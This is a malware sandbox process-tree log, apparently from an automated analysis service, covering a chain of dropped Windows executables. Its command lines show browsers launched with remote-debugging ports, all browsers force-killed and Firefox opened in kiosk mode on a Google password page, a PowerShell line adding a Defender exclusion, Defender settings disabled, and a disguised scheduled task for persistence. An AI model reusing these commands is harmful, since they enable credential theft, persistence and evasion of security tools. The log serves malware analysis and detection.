C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7249758,0x7fef7249768,0x7fef72497785⤵PID:836
-
-
C:\Windows\system32\ctfmon.exectfmon.exe5⤵PID:2312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1144 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:25⤵PID:2032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1416 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:85⤵PID:1648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1560 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:85⤵PID:832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2312 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:1148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2320 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:1480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1572 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:25⤵PID:1528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1128 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:1260
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3500 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:85⤵PID:888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3620 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:85⤵PID:2964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3540 --field-trial-handle=1336,i,17291559389611648657,14275795035444281516,131072 /prefetch:85⤵PID:2000
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\4wtrq" & exit4⤵
- System Location Discovery: System Language Discovery
PID:904 -
C:\Windows\SysWOW64\timeout.exetimeout /t 115⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1552
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127840101\1f63359651.exe"C:\Users\Admin\AppData\Local\Temp\10127840101\1f63359651.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1740 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2784
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127850101\7c80f0564f.exe"C:\Users\Admin\AppData\Local\Temp\10127850101\7c80f0564f.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1576 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1708
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127860101\0af8120bbc.exe"C:\Users\Admin\AppData\Local\Temp\10127860101\0af8120bbc.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1356
-
-
C:\Users\Admin\AppData\Local\Temp\10127870101\9ba1970019.exe"C:\Users\Admin\AppData\Local\Temp\10127870101\9ba1970019.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:912 -
C:\Users\Admin\AppData\Local\Temp\10127870101\9ba1970019.exe"C:\Users\Admin\AppData\Local\Temp\10127870101\9ba1970019.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2376 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 10125⤵
- Loads dropped DLL
- Program crash
PID:352
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 912 -s 5004⤵
- Loads dropped DLL
- Program crash
PID:2924
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127880101\d875f8b7d2.exe"C:\Users\Admin\AppData\Local\Temp\10127880101\d875f8b7d2.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2908 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 12044⤵
- Loads dropped DLL
- Program crash
PID:2156
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127890101\899dbfe959.exe"C:\Users\Admin\AppData\Local\Temp\10127890101\899dbfe959.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1788
-
-
C:\Users\Admin\AppData\Local\Temp\10127900101\6107dcdc10.exe"C:\Users\Admin\AppData\Local\Temp\10127900101\6107dcdc10.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1980 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:2268
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1728 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1728.0.753943364\1965050490" -parentBuildID 20221007134813 -prefsHandle 1208 -prefMapHandle 1140 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a9685b2-708f-45d9-a799-643a4b23f66f} 1728 "\\.\pipe\gecko-crash-server-pipe.1728" 1284 106ee158 gpu6⤵PID:2896
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1728.1.1903985792\525476844" -parentBuildID 20221007134813 -prefsHandle 1472 -prefMapHandle 1468 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e47c30ae-904f-4915-b5b1-7e3f90ba0593} 1728 "\\.\pipe\gecko-crash-server-pipe.1728" 1484 d71b58 socket6⤵PID:1992
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1728.2.2126172450\2094734483" -childID 1 -isForBrowser -prefsHandle 1916 -prefMapHandle 1912 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cdeaf19d-74ab-4fdd-87db-ed14b3798c21} 1728 "\\.\pipe\gecko-crash-server-pipe.1728" 1928 1065d858 tab6⤵PID:1480
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1728.3.1255685218\1588342080" -childID 2 -isForBrowser -prefsHandle 2720 -prefMapHandle 2716 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {003f594c-96ef-4ef8-ad36-ddfa3b894f4d} 1728 "\\.\pipe\gecko-crash-server-pipe.1728" 2732 d5f658 tab6⤵PID:2280
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1728.4.613843703\427024570" -childID 3 -isForBrowser -prefsHandle 3800 -prefMapHandle 3796 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {50d2bb6b-1175-46ed-b5ca-4c08a8fc3a4f} 1728 "\\.\pipe\gecko-crash-server-pipe.1728" 3812 1f98f258 tab6⤵PID:2644
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1728.5.207015307\660329867" -childID 4 -isForBrowser -prefsHandle 3944 -prefMapHandle 3948 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff569b5d-24a3-4afa-a27d-8340b8afc9f0} 1728 "\\.\pipe\gecko-crash-server-pipe.1728" 3936 1f98fb58 tab6⤵PID:912
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1728.6.487639801\1557148514" -childID 5 -isForBrowser -prefsHandle 4116 -prefMapHandle 4120 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {85adc38b-12d5-4d31-87b7-87a48110f4b6} 1728 "\\.\pipe\gecko-crash-server-pipe.1728" 4104 1f98fe58 tab6⤵PID:944
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127910101\357210bdae.exe"C:\Users\Admin\AppData\Local\Temp\10127910101\357210bdae.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
C:\Users\Admin\AppData\Local\Temp\10127920101\sqVWjvh.exe"C:\Users\Admin\AppData\Local\Temp\10127920101\sqVWjvh.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3212 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3320 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef51b9758,0x7fef51b9768,0x7fef51b97785⤵PID:3392
-
-
C:\Windows\system32\ctfmon.exectfmon.exe5⤵PID:3496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1108 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:25⤵PID:3580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1372 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:85⤵PID:3592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1592 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:85⤵PID:3636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2172 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:3716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2188 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:3724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1564 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:25⤵PID:3140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1492 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:1048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3504 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:85⤵PID:3172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3624 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:85⤵PID:3560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3636 --field-trial-handle=1268,i,5332679071003746695,12168415670502501695,131072 /prefetch:85⤵PID:4088
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10127931121\skf7iF4.cmd"3⤵
- System Location Discovery: System Language Discovery
PID:3092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\10127931121\skf7iF4.cmd' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3284 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10127931121\skf7iF4.cmd" sgcCUaUFtA5⤵
- System Location Discovery: System Language Discovery
PID:2220 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3772 -
C:\Windows\SysWOW64\findstr.exe"C:\Windows\system32\findstr.exe" /i WDS100T2B0A7⤵
- System Location Discovery: System Language Discovery
PID:3896
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127940101\PQkVDtx.exe"C:\Users\Admin\AppData\Local\Temp\10127940101\PQkVDtx.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Enumerates system info in registry
PID:2388 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:620
-
-
C:\Program Files\runtime\COM Surrogate.exe"C:\Program Files\runtime\COM Surrogate.exe"4⤵
- Executes dropped EXE
PID:3564
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127950101\packed.exe"C:\Users\Admin\AppData\Local\Temp\10127950101\packed.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Enumerates system info in registry
PID:3220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3664
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "COM Surrogate Task" /tr "C:\Program Files\runtime\COM Surrogate.exe" /sc onlogon /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:1776
-
-
C:\Program Files\runtime\COM Surrogate.exe"C:\Program Files\runtime\COM Surrogate.exe"4⤵
- Executes dropped EXE
PID:3776
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127960101\bncn6rv.exe"C:\Users\Admin\AppData\Local\Temp\10127960101\bncn6rv.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3856 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3828 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef51b9758,0x7fef51b9768,0x7fef51b97785⤵PID:3216
-
-
C:\Windows\system32\ctfmon.exectfmon.exe5⤵PID:3316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1188,i,9747478351262096364,2331525272836963796,131072 /prefetch:25⤵PID:3812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1464 --field-trial-handle=1188,i,9747478351262096364,2331525272836963796,131072 /prefetch:85⤵PID:1700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1628 --field-trial-handle=1188,i,9747478351262096364,2331525272836963796,131072 /prefetch:85⤵PID:3876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2216 --field-trial-handle=1188,i,9747478351262096364,2331525272836963796,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:3808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2512 --field-trial-handle=1188,i,9747478351262096364,2331525272836963796,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:3428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2348 --field-trial-handle=1188,i,9747478351262096364,2331525272836963796,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:1236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1164 --field-trial-handle=1188,i,9747478351262096364,2331525272836963796,131072 /prefetch:25⤵PID:4196
-
-
-
